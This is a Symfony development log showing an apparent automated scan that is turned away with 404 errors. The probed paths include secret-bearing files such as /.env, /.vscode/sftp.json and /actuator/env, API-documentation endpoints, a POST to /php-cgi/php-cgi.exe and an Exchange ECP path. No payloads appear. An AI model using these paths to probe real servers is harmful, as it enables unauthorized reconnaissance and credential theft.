[2025-12-16 17:01:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:01:14] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:01:14] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 17:01:14] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 17:01:14] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 17:01:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
